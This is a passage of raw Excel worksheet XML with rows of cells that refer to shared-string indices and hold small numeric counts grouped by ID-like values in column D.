      </c>
      <c r="B11150" t="s">
        <v>16212</v>
      </c>
      <c r="C11150">
        <v>0</v>
      </c>
      <c r="D11150">
        <v>4969</v>
      </c>
    </row>
    <row r="11151" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11151" t="s">
        <v>16228</v>
      </c>
      <c r="B11151" t="s">
        <v>16213</v>
      </c>
      <c r="C11151">
        <v>0</v>
      </c>
      <c r="D11151">
        <v>4969</v>
      </c>
    </row>
    <row r="11152" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11152" t="s">
        <v>16231</v>
      </c>
      <c r="B11152" t="s">
        <v>16214</v>
      </c>
      <c r="C11152">
        <v>0</v>
      </c>
      <c r="D11152">
        <v>4969</v>
      </c>
    </row>
    <row r="11153" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11153" t="s">
        <v>16228</v>
      </c>
      <c r="B11153" t="s">
        <v>16215</v>
      </c>
      <c r="C11153">
        <v>1</v>
      </c>
      <c r="D11153">
        <v>4969</v>
      </c>
    </row>
    <row r="11154" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11154" t="s">
        <v>16231</v>
      </c>
      <c r="B11154" t="s">
        <v>16216</v>
      </c>
      <c r="C11154">
        <v>0</v>
      </c>
      <c r="D11154">
        <v>4969</v>
      </c>
    </row>
    <row r="11155" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11155" t="s">
        <v>16228</v>
      </c>
      <c r="B11155" t="s">
        <v>16217</v>
      </c>
      <c r="C11155">
        <v>3</v>
      </c>
      <c r="D11155">
        <v>4969</v>
      </c>
    </row>
    <row r="11156" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11156" t="s">
        <v>16231</v>
      </c>
      <c r="B11156" t="s">
        <v>16218</v>
      </c>
      <c r="C11156">
        <v>0</v>
      </c>
      <c r="D11156">
        <v>4969</v>
      </c>
    </row>
    <row r="11157" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11157" t="s">
        <v>16229</v>
      </c>
      <c r="B11157" t="s">
        <v>16219</v>
      </c>
      <c r="C11157">
        <v>0</v>
      </c>
      <c r="D11157">
        <v>4969</v>
      </c>
    </row>
    <row r="11158" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11158" t="s">
        <v>16230</v>
      </c>
      <c r="B11158" t="s">
        <v>16220</v>
      </c>
      <c r="C11158">
        <v>0</v>
      </c>
      <c r="D11158">
        <v>4969</v>
      </c>
    </row>
    <row r="11159" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11159" t="s">
        <v>16229</v>
      </c>
      <c r="B11159" t="s">
        <v>16221</v>
      </c>
      <c r="C11159">
        <v>1</v>
      </c>
      <c r="D11159">
        <v>4969</v>
      </c>
    </row>
    <row r="11160" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11160" t="s">
        <v>16230</v>
      </c>
      <c r="B11160" t="s">
        <v>16222</v>
      </c>
      <c r="C11160">
        <v>0</v>
      </c>
      <c r="D11160">
        <v>4969</v>
      </c>
    </row>
    <row r="11161" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11161" t="s">
        <v>16223</v>
      </c>
      <c r="B11161" t="s">
        <v>16223</v>
      </c>
      <c r="C11161">
        <v>26</v>
      </c>
      <c r="D11161">
        <v>4969</v>
      </c>
    </row>
    <row r="11162" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11162" t="s">
        <v>16224</v>
      </c>
      <c r="B11162" t="s">
        <v>16224</v>
      </c>
      <c r="C11162">
        <v>0</v>
      </c>
      <c r="D11162">
        <v>4969</v>
      </c>
    </row>
    <row r="11163" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11163" t="s">
        <v>16228</v>
      </c>
      <c r="B11163" t="s">
        <v>16211</v>
      </c>
      <c r="C11163">
        <v>5</v>
      </c>
      <c r="D11163">
        <v>1107</v>
      </c>
    </row>
    <row r="11164" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11164" t="s">
        <v>16231</v>
      </c>
      <c r="B11164" t="s">
        <v>16212</v>
      </c>
      <c r="C11164">
        <v>10</v>
      </c>
      <c r="D11164">
        <v>1107</v>
      </c>
    </row>
    <row r="11165" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11165" t="s">
        <v>16228</v>
      </c>
      <c r="B11165" t="s">
        <v>16213</v>
      </c>
      <c r="C11165">
        <v>50</v>
      </c>
      <c r="D11165">
        <v>1107</v>
      </c>
    </row>
    <row r="11166" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11166" t="s">
        <v>16231</v>
      </c>
      <c r="B11166" t="s">
        <v>16214</v>
      </c>
      <c r="C11166">
        <v>20</v>
      </c>
      <c r="D11166">
        <v>1107</v>
      </c>
    </row>
    <row r="11167" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11167" t="s">
        <v>16228</v>
      </c>
      <c r="B11167" t="s">
        <v>16215</v>
      </c>
      <c r="C11167">
        <v>5</v>
      </c>
      <c r="D11167">
        <v>1107</v>
      </c>
    </row>
    <row r="11168" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11168" t="s">
        <v>16231</v>
      </c>
      <c r="B11168" t="s">
        <v>16216</v>
      </c>
      <c r="C11168">
        <v>10</v>
      </c>
      <c r="D11168">
        <v>1107</v>
      </c>
    </row>
    <row r="11169" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11169" t="s">
        <v>16228</v>
      </c>
      <c r="B11169" t="s">
        <v>16217</v>
      </c>
      <c r="C11169">
        <v>5</v>
      </c>
      <c r="D11169">
        <v>1107</v>
      </c>
    </row>
    <row r="11170" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11170" t="s">
        <v>16231</v>
      </c>
      <c r="B11170" t="s">
        <v>16218</v>
      </c>
      <c r="C11170">
        <v>0</v>
      </c>
      <c r="D11170">
        <v>1107</v>
      </c>
    </row>
    <row r="11171" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11171" t="s">
        <v>16229</v>
      </c>
      <c r="B11171" t="s">
        <v>16219</v>
      </c>
      <c r="C11171">
        <v>0</v>
      </c>
      <c r="D11171">
        <v>1107</v>
      </c>
    </row>
    <row r="11172" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11172" t="s">
        <v>16230</v>
      </c>
      <c r="B11172" t="s">
        <v>16220</v>
      </c>
      <c r="C11172">
        <v>0</v>
      </c>
      <c r="D11172">
        <v>1107</v>
      </c>
    </row>
    <row r="11173" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11173" t="s">
        <v>16229</v>
      </c>
      <c r="B11173" t="s">
        <v>16221</v>
      </c>
      <c r="C11173">
        <v>45</v>
      </c>
      <c r="D11173">
        <v>1107</v>
      </c>
    </row>
    <row r="11174" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11174" t="s">
        <v>16230</v>
      </c>
      <c r="B11174" t="s">
        <v>16222</v>
      </c>
      <c r="C11174">
        <v>20</v>
      </c>
      <c r="D11174">
        <v>1107</v>
      </c>
    </row>
    <row r="11175" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11175" t="s">
        <v>16223</v>
      </c>
      <c r="B11175" t="s">
        <v>16223</v>
      </c>
      <c r="C11175">
        <v>30</v>
      </c>
      <c r="D11175">
        <v>1107</v>
      </c>
    </row>
    <row r="11176" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11176" t="s">
        <v>16224</v>
      </c>
      <c r="B11176" t="s">
        <v>16224</v>
      </c>
      <c r="C11176">
        <v>3</v>
      </c>
      <c r="D11176">
        <v>1107</v>
      </c>
    </row>
    <row r="11177" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11177" t="s">
        <v>16228</v>
      </c>
      <c r="B11177" t="s">
        <v>16211</v>
      </c>
      <c r="C11177">
        <v>1</v>
      </c>
      <c r="D11177">
        <v>1048</v>
      </c>
    </row>
    <row r="11178" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11178" t="s">
        <v>16231</v>
      </c>
      <c r="B11178" t="s">
        <v>16212</v>
      </c>
      <c r="C11178">
        <v>0</v>
      </c>
      <c r="D11178">
        <v>1048</v>
      </c>
    </row>
    <row r="11179" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11179" t="s">
        <v>16228</v>
      </c>
      <c r="B11179" t="s">
        <v>16213</v>
      </c>
      <c r="C11179">
        <v>0</v>
      </c>
      <c r="D11179">
        <v>1048</v>
      </c>
    </row>
    <row r="11180" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11180" t="s">
        <v>16231</v>
      </c>
      <c r="B11180" t="s">
        <v>16214</v>
      </c>
      <c r="C11180">
        <v>0</v>
      </c>
      <c r="D11180">
        <v>1048</v>
      </c>
    </row>
    <row r="11181" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11181" t="s">
        <v>16228</v>
      </c>
      <c r="B11181" t="s">
        <v>16215</v>
      </c>
      <c r="C11181">
        <v>25</v>
      </c>
      <c r="D11181">
        <v>1048</v>
      </c>
    </row>
    <row r="11182" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11182" t="s">
        <v>16231</v>
      </c>
      <c r="B11182" t="s">
        <v>16216</v>
      </c>
      <c r="C11182">
        <v>4</v>
      </c>
      <c r="D11182">
        <v>1048</v>
      </c>
    </row>
    <row r="11183" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11183" t="s">
        <v>16228</v>
      </c>
      <c r="B11183" t="s">
        <v>16217</v>
      </c>
      <c r="C11183">
        <v>16</v>
      </c>
      <c r="D11183">
        <v>1048</v>
      </c>
    </row>
    <row r="11184" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11184" t="s">
        <v>16231</v>
      </c>
      <c r="B11184" t="s">
        <v>16218</v>
      </c>
      <c r="C11184">
        <v>11</v>
      </c>
      <c r="D11184">
        <v>1048</v>
      </c>
    </row>
    <row r="11185" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11185" t="s">
        <v>16229</v>
      </c>
      <c r="B11185" t="s">
        <v>16219</v>
      </c>
      <c r="C11185">
        <v>4</v>
      </c>
      <c r="D11185">
        <v>1048</v>
      </c>
    </row>
    <row r="11186" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11186" t="s">
        <v>16230</v>
      </c>
      <c r="B11186" t="s">
        <v>16220</v>
      </c>
      <c r="C11186">
        <v>2</v>
      </c>
      <c r="D11186">
        <v>1048</v>
      </c>
    </row>
    <row r="11187" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11187" t="s">
        <v>16229</v>
      </c>
      <c r="B11187" t="s">
        <v>16221</v>
      </c>
      <c r="C11187">
        <v>24</v>
      </c>
      <c r="D11187">
        <v>1048</v>
      </c>
    </row>
    <row r="11188" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11188" t="s">
        <v>16230</v>
      </c>
      <c r="B11188" t="s">
        <v>16222</v>
      </c>
      <c r="C11188">
        <v>48</v>
      </c>
      <c r="D11188">
        <v>1048</v>
      </c>
    </row>
    <row r="11189" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11189" t="s">
        <v>16223</v>
      </c>
      <c r="B11189" t="s">
        <v>16223</v>
      </c>
      <c r="C11189">
        <v>6</v>
      </c>
      <c r="D11189">
        <v>1048</v>
      </c>
    </row>
    <row r="11190" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11190" t="s">
        <v>16224</v>
      </c>
      <c r="B11190" t="s">
        <v>16224</v>
      </c>
      <c r="C11190">
        <v>1</v>
      </c>
      <c r="D11190">
        <v>1048</v>
      </c>
    </row>
    <row r="11191" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11191" t="s">
        <v>16228</v>
      </c>
      <c r="B11191" t="s">
        <v>16211</v>
      </c>
      <c r="C11191">
        <v>0</v>
      </c>
      <c r="D11191">
        <v>1127</v>
      </c>
    </row>
    <row r="11192" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11192" t="s">
        <v>16231</v>
      </c>
      <c r="B11192" t="s">
        <v>16212</v>
      </c>
      <c r="C11192">
        <v>0</v>
      </c>
      <c r="D11192">
        <v>1127</v>
      </c>
    </row>
    <row r="11193" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11193" t="s">
        <v>16228</v>
      </c>
      <c r="B11193" t="s">
        <v>16213</v>
      </c>
      <c r="C11193">
        <v>0</v>
      </c>
      <c r="D11193">
        <v>1127</v>
      </c>
    </row>
    <row r="11194" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11194" t="s">
        <v>16231</v>
      </c>
      <c r="B11194" t="s">
        <v>16214</v>
      </c>
      <c r="C11194">
        <v>0</v>
      </c>
      <c r="D11194">
        <v>1127</v>
      </c>
    </row>
    <row r="11195" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11195" t="s">
        <v>16228</v>
      </c>
      <c r="B11195" t="s">
        <v>16215</v>
      </c>
      <c r="C11195">
        <v>16</v>
      </c>
      <c r="D11195">
        <v>1127</v>
      </c>
    </row>
    <row r="11196" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11196" t="s">
        <v>16231</v>
      </c>
      <c r="B11196" t="s">
        <v>16216</v>
      </c>
      <c r="C11196">
        <v>6</v>
      </c>
      <c r="D11196">
        <v>1127</v>
      </c>
    </row>
    <row r="11197" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11197" t="s">
        <v>16228</v>
      </c>
      <c r="B11197" t="s">
        <v>16217</v>
      </c>
      <c r="C11197">
        <v>9</v>
      </c>
      <c r="D11197">
        <v>1127</v>
      </c>
    </row>
    <row r="11198" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11198" t="s">
        <v>16231</v>
      </c>
      <c r="B11198" t="s">
        <v>16218</v>
      </c>
      <c r="C11198">
        <v>4</v>
      </c>
      <c r="D11198">
        <v>1127</v>
      </c>
    </row>
    <row r="11199" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11199" t="s">
        <v>16229</v>
      </c>
      <c r="B11199" t="s">
        <v>16219</v>
      </c>
      <c r="C11199">
        <v>4</v>
      </c>
      <c r="D11199">
        <v>1127</v>
      </c>
    </row>
    <row r="11200" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11200" t="s">
        <v>16230</v>
      </c>
      <c r="B11200" t="s">
        <v>16220</v>
      </c>
      <c r="C11200">
        <v>0</v>
      </c>
      <c r="D11200">
        <v>1127</v>
      </c>
    </row>
    <row r="11201" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11201" t="s">
        <v>16229</v>
      </c>
      <c r="B11201" t="s">
        <v>16221</v>
      </c>
      <c r="C11201">
        <v>44</v>
      </c>
      <c r="D11201">
        <v>1127</v>
      </c>
    </row>
    <row r="11202" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11202" t="s">
        <v>16230</v>
      </c>
      <c r="B11202" t="s">
        <v>16222</v>
      </c>
      <c r="C11202">
        <v>4</v>
      </c>
      <c r="D11202">
        <v>1127</v>
      </c>
    </row>
    <row r="11203" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11203" t="s">
        <v>16223</v>
      </c>
      <c r="B11203" t="s">
        <v>16223</v>
      </c>
      <c r="C11203">
        <v>26</v>
      </c>
      <c r="D11203">
        <v>1127</v>
      </c>
    </row>
    <row r="11204" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11204" t="s">
        <v>16224</v>
      </c>
      <c r="B11204" t="s">
        <v>16224</v>
      </c>
      <c r="C11204">
        <v>1</v>
      </c>
      <c r="D11204">
        <v>1127</v>
      </c>
    </row>
    <row r="11205" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11205" t="s">
        <v>16228</v>
      </c>
      <c r="B11205" t="s">
        <v>16211</v>
      </c>
      <c r="C11205">
        <v>0</v>
      </c>
      <c r="D11205">
        <v>1182</v>
      </c>
    </row>
    <row r="11206" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11206" t="s">
        <v>16231</v>
      </c>
      <c r="B11206" t="s">
        <v>16212</v>
      </c>
      <c r="C11206">
        <v>0</v>
      </c>
      <c r="D11206">
        <v>1182</v>
      </c>
    </row>
    <row r="11207" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11207" t="s">
        <v>16228</v>
      </c>
      <c r="B11207" t="s">
        <v>16213</v>
      </c>
      <c r="C11207">
        <v>0</v>
      </c>
      <c r="D11207">
        <v>1182</v>
      </c>
    </row>
    <row r="11208" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11208" t="s">
        <v>16231</v>
      </c>
      <c r="B11208" t="s">
        <v>16214</v>
      </c>
      <c r="C11208">
        <v>0</v>
      </c>
      <c r="D11208">
        <v>1182</v>
      </c>
    </row>
    <row r="11209" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11209" t="s">
        <v>16228</v>
      </c>
      <c r="B11209" t="s">
        <v>16215</v>
      </c>
      <c r="C11209">
        <v>14</v>
      </c>
      <c r="D11209">
        <v>1182</v>
      </c>
    </row>
    <row r="11210" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11210" t="s">
        <v>16231</v>
      </c>
      <c r="B11210" t="s">
        <v>16216</v>
      </c>
      <c r="C11210">
        <v>7</v>
      </c>
      <c r="D11210">
        <v>1182</v>
      </c>
    </row>
    <row r="11211" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11211" t="s">
        <v>16228</v>
      </c>
      <c r="B11211" t="s">
        <v>16217</v>
      </c>
      <c r="C11211">
        <v>18</v>
      </c>
      <c r="D11211">
        <v>1182</v>
      </c>
    </row>
    <row r="11212" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11212" t="s">
        <v>16231</v>
      </c>
      <c r="B11212" t="s">
        <v>16218</v>
      </c>
      <c r="C11212">
        <v>5</v>
      </c>
      <c r="D11212">
        <v>1182</v>
      </c>
    </row>
    <row r="11213" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11213" t="s">
        <v>16229</v>
      </c>
      <c r="B11213" t="s">
        <v>16219</v>
      </c>
      <c r="C11213">
        <v>10</v>
      </c>
      <c r="D11213">
        <v>1182</v>
      </c>
    </row>
    <row r="11214" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11214" t="s">
        <v>16230</v>
      </c>
      <c r="B11214" t="s">
        <v>16220</v>
      </c>
      <c r="C11214">
        <v>3</v>
      </c>
      <c r="D11214">
        <v>1182</v>
      </c>
    </row>
    <row r="11215" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11215" t="s">
        <v>16229</v>
      </c>
      <c r="B11215" t="s">
        <v>16221</v>
      </c>
      <c r="C11215">
        <v>22</v>
      </c>
      <c r="D11215">
        <v>1182</v>
      </c>
    </row>
    <row r="11216" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11216" t="s">
        <v>16230</v>
      </c>
      <c r="B11216" t="s">
        <v>16222</v>
      </c>
      <c r="C11216">
        <v>67</v>
      </c>
      <c r="D11216">
        <v>1182</v>
      </c>
    </row>
    <row r="11217" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11217" t="s">
        <v>16223</v>
      </c>
      <c r="B11217" t="s">
        <v>16223</v>
      </c>
      <c r="C11217">
        <v>25</v>
      </c>
      <c r="D11217">
        <v>1182</v>
      </c>
    </row>
    <row r="11218" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11218" t="s">
        <v>16224</v>
      </c>
      <c r="B11218" t="s">
        <v>16224</v>
      </c>
      <c r="C11218">
        <v>0</v>
      </c>
      <c r="D11218">
        <v>1182</v>
      </c>
    </row>
    <row r="11219" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11219" t="s">
        <v>16228</v>
      </c>
      <c r="B11219" t="s">
        <v>16211</v>
      </c>
      <c r="C11219">
        <v>0</v>
      </c>
      <c r="D11219">
        <v>1399</v>
      </c>
    </row>
    <row r="11220" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11220" t="s">
        <v>16231</v>
      </c>
      <c r="B11220" t="s">
        <v>16212</v>
      </c>
      <c r="C11220">
        <v>0</v>
      </c>
      <c r="D11220">
        <v>1399</v>
      </c>
    </row>
    <row r="11221" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11221" t="s">
        <v>16228</v>
      </c>
      <c r="B11221" t="s">
        <v>16213</v>
      </c>
      <c r="C11221">
        <v>0</v>
      </c>
      <c r="D11221">
        <v>1399</v>
      </c>
    </row>
    <row r="11222" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11222" t="s">
        <v>16231</v>
      </c>
      <c r="B11222" t="s">
        <v>16214</v>
      </c>
      <c r="C11222">
        <v>0</v>
      </c>
      <c r="D11222">
        <v>1399</v>
      </c>
    </row>
    <row r="11223" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11223" t="s">
        <v>16228</v>
      </c>
      <c r="B11223" t="s">
        <v>16215</v>
      </c>
      <c r="C11223">
        <v>2</v>
      </c>
      <c r="D11223">
        <v>1399</v>
      </c>
    </row>
    <row r="11224" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11224" t="s">
        <v>16231</v>
      </c>
      <c r="B11224" t="s">
        <v>16216</v>
      </c>
      <c r="C11224">
        <v>2</v>
      </c>
      <c r="D11224">
        <v>1399</v>
      </c>
    </row>
    <row r="11225" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11225" t="s">
        <v>16228</v>
      </c>
      <c r="B11225" t="s">
        <v>16217</v>
      </c>
      <c r="C11225">
        <v>4</v>
      </c>
      <c r="D11225">
        <v>1399</v>
      </c>
    </row>
    <row r="11226" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11226" t="s">
        <v>16231</v>
      </c>
      <c r="B11226" t="s">
        <v>16218</v>
      </c>
      <c r="C11226">
        <v>0</v>
      </c>
      <c r="D11226">
        <v>1399</v>
      </c>
    </row>
    <row r="11227" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11227" t="s">
        <v>16229</v>
      </c>
      <c r="B11227" t="s">
        <v>16219</v>
      </c>
      <c r="C11227">
        <v>2</v>
      </c>
      <c r="D11227">
        <v>1399</v>
      </c>
    </row>
    <row r="11228" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11228" t="s">
        <v>16230</v>
      </c>
      <c r="B11228" t="s">
        <v>16220</v>
      </c>
      <c r="C11228">
        <v>2</v>
      </c>
      <c r="D11228">
        <v>1399</v>
      </c>
    </row>
    <row r="11229" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11229" t="s">
        <v>16229</v>
      </c>
      <c r="B11229" t="s">
        <v>16221</v>
      </c>
      <c r="C11229">
        <v>4</v>
      </c>
      <c r="D11229">
        <v>1399</v>
      </c>
    </row>
    <row r="11230" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11230" t="s">
        <v>16230</v>
      </c>
      <c r="B11230" t="s">
        <v>16222</v>
      </c>
      <c r="C11230">
        <v>0</v>
      </c>
      <c r="D11230">
        <v>1399</v>
      </c>
    </row>
    <row r="11231" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11231" t="s">
        <v>16223</v>
      </c>
      <c r="B11231" t="s">
        <v>16223</v>
      </c>
      <c r="C11231">
        <v>30</v>
      </c>
      <c r="D11231">
        <v>1399</v>
      </c>
    </row>
    <row r="11232" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11232" t="s">
        <v>16224</v>
      </c>
      <c r="B11232" t="s">
        <v>16224</v>
      </c>
      <c r="C11232">
        <v>0</v>
      </c>
      <c r="D11232">
        <v>1399</v>
      </c>
    </row>
    <row r="11233" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11233" t="s">
        <v>16228</v>
      </c>
      <c r="B11233" t="s">
        <v>16211</v>
      </c>
      <c r="C11233">
        <v>0</v>
      </c>
      <c r="D11233">
        <v>4954</v>
      </c>
    </row>
    <row r="11234" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11234" t="s">
        <v>16231</v>
      </c>
      <c r="B11234" t="s">
        <v>16212</v>
      </c>
      <c r="C11234">
        <v>0</v>
      </c>
      <c r="D11234">
        <v>4954</v>
      </c>
    </row>
    <row r="11235" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11235" t="s">
        <v>16228</v>
      </c>
      <c r="B11235" t="s">
        <v>16213</v>
      </c>
      <c r="C11235">
        <v>0</v>
      </c>
      <c r="D11235">
        <v>4954</v>
      </c>
    </row>
    <row r="11236" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11236" t="s">
        <v>16231</v>
      </c>
      <c r="B11236" t="s">
        <v>16214</v>
      </c>
      <c r="C11236">
        <v>0</v>
      </c>
      <c r="D11236">
        <v>4954</v>
      </c>
    </row>
    <row r="11237" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11237" t="s">
        <v>16228</v>
      </c>
      <c r="B11237" t="s">
        <v>16215</v>
      </c>
      <c r="C11237">
        <v>1</v>
      </c>
      <c r="D11237">
        <v>4954</v>
      </c>
    </row>
    <row r="11238" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11238" t="s">
        <v>16231</v>
      </c>
      <c r="B11238" t="s">
        <v>16216</v>
      </c>
      <c r="C11238">
        <v>2</v>
      </c>
      <c r="D11238">
        <v>4954</v>
      </c>
    </row>
    <row r="11239" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11239" t="s">
        <v>16228</v>
      </c>
      <c r="B11239" t="s">
        <v>16217</v>
      </c>
      <c r="C11239">
        <v>0</v>
      </c>
      <c r="D11239">
        <v>4954</v>
      </c>
    </row>
    <row r="11240" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11240" t="s">
        <v>16231</v>
      </c>
      <c r="B11240" t="s">
        <v>16218</v>
      </c>
      <c r="C11240">
        <v>0</v>
      </c>
      <c r="D11240">
        <v>4954</v>
      </c>
    </row>
    <row r="11241" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11241" t="s">
        <v>16229</v>
      </c>
      <c r="B11241" t="s">
        <v>16219</v>
      </c>
      <c r="C11241">
        <v>0</v>
      </c>
      <c r="D11241">
        <v>4954</v>
      </c>
    </row>
    <row r="11242" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11242" t="s">
        <v>16230</v>
      </c>
      <c r="B11242" t="s">
        <v>16220</v>
      </c>
      <c r="C11242">
        <v>0</v>
      </c>
      <c r="D11242">
        <v>4954</v>
      </c>
    </row>
    <row r="11243" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11243" t="s">
        <v>16229</v>
      </c>
      <c r="B11243" t="s">
        <v>16221</v>
      </c>
      <c r="C11243">
        <v>16</v>
      </c>
      <c r="D11243">
        <v>4954</v>
      </c>
    </row>
    <row r="11244" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11244" t="s">
        <v>16230</v>
      </c>
      <c r="B11244" t="s">
        <v>16222</v>
      </c>
      <c r="C11244">
        <v>0</v>
      </c>
      <c r="D11244">
        <v>4954</v>
      </c>
    </row>
    <row r="11245" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11245" t="s">
        <v>16223</v>
      </c>
      <c r="B11245" t="s">
        <v>16223</v>
      </c>
      <c r="C11245">
        <v>30</v>
      </c>
      <c r="D11245">
        <v>4954</v>
      </c>
    </row>
    <row r="11246" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11246" t="s">
        <v>16224</v>
      </c>
      <c r="B11246" t="s">
        <v>16224</v>
      </c>
      <c r="C11246">
        <v>1</v>
      </c>
      <c r="D11246">
        <v>4954</v>
      </c>
    </row>
    <row r="11247" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11247" t="s">
        <v>16228</v>
      </c>
      <c r="B11247" t="s">
        <v>16211</v>
      </c>
      <c r="C11247">
        <v>1</v>
      </c>
      <c r="D11247">
        <v>1230</v>
      </c>
    </row>
    <row r="11248" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11248" t="s">
        <v>16231</v>
      </c>
      <c r="B11248" t="s">
        <v>16212</v>
      </c>
      <c r="C11248">
        <v>1</v>
      </c>
      <c r="D11248">
        <v>1230</v>
      </c>
    </row>
    <row r="11249" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11249" t="s">
        <v>16228</v>
      </c>
      <c r="B11249" t="s">
        <v>16213</v>
      </c>
      <c r="C11249">
        <v>0</v>
      </c>
      <c r="D11249">
        <v>1230</v>
      </c>
    </row>
    <row r="11250" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11250" t="s">
        <v>16231</v>
      </c>
      <c r="B11250" t="s">
        <v>16214</v>
      </c>
      <c r="C11250">
        <v>0</v>
      </c>
      <c r="D11250">
        <v>1230</v>
      </c>
    </row>
    <row r="11251" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11251" t="s">
        <v>16228</v>
      </c>
      <c r="B11251" t="s">
        <v>16215</v>
      </c>
      <c r="C11251">
        <v>0</v>
      </c>
      <c r="D11251">
        <v>1230</v>
      </c>
    </row>
    <row r="11252" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11252" t="s">
        <v>16231</v>
      </c>
      <c r="B11252" t="s">
        <v>16216</v>
      </c>
      <c r="C11252">
        <v>3</v>
      </c>
      <c r="D11252">
        <v>1230</v>
      </c>
    </row>
    <row r="11253" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11253" t="s">
        <v>16228</v>
      </c>
      <c r="B11253" t="s">
        <v>16217</v>
      </c>
      <c r="C11253">
        <v>3</v>
      </c>
      <c r="D11253">
        <v>1230</v>
      </c>
    </row>
    <row r="11254" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11254" t="s">
        <v>16231</v>
      </c>
      <c r="B11254" t="s">
        <v>16218</v>
      </c>
      <c r="C11254">
        <v>16</v>
      </c>
      <c r="D11254">
        <v>1230</v>
      </c>
    </row>
    <row r="11255" spans="1:4" x14ac:dyDescent="0.2">
